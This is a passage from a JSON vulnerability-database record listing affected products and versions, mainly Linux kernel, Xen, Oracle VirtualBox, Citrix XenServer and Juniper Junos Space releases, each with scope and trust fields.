        "version": "3.12.18"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.2.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.87"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.90"
      },
      {
        "model": "vm server for",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "x863.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.53"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.4.0"
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "12.3"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.0.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.3"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.71"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.1.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.67"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.40"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.11"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "13.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.26"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.70"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6"
      },
      {
        "model": "junos space 15.2r1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.15"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.1.0"
      },
      {
        "model": "windows server r2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20120"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.22"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "6"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17.2"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.3.2"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.1.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.29"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.62"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.76"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.4.2"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.1.3"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.24"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.10"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.43"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.44"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.0.3"
      },
      {
        "model": "windows server r2 for x64-based systems sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2008"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.55"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.4"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.81"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.50"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.37"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.2"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.9"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.19"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.10"
      },
      {
        "model": "windows server for x64-based systems sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2008"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.59"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0.9"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.11"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "7"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.23"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.72"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.75"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.66"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.0.2"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.2"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "13.3"
      },
      {
        "model": "xenserver sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "6.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.64"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.63"
      },
      {
        "model": "junos space 15.2r2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "vm virtualbox",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.7"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "6.1"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.26"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.2.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.93"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.1"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.1"
      },
      {
        "model": "xenserver common criteria",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.57"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.31"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.31"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.0.6"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.73"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.1"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.1.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.64"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.1.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.56"
      },
      {
        "model": "junos space 14.1r1.9",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.25"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.43"
      },
      {
        "model": "windows for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "8.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.18"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.44"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.73"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.65"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.7"
      },
      {
        "model": "junos space 16.1r1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.4.4"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.9.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.42"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.30"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.3.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.3"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.9"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.41"
      },
      {
        "model": "linux lts",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "14.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17.4"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.58"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.10"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "13.1"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.35"
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "12.1"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.2"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.0.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.12"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.30"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.6"
      },
      {
        "model": "linux enterprise server sp4 ltss",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.6"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.13"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "6.0.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.5"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.0.2"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.35"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.72"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.7"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.2.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.52"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.1.8"
      },
      {
        "model": "vm virtualbox",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.44"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.14"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.1"
      },
      {
        "model": "xenserver fp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.4"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.38"
      },
      {
        "model": "xenserver sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.6"
      },
      {
        "model": "vm virtualbox",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8"
      },
      {
        "model": "vm server for",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "x863.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.51"
      },
      {
        "model": "kernel",
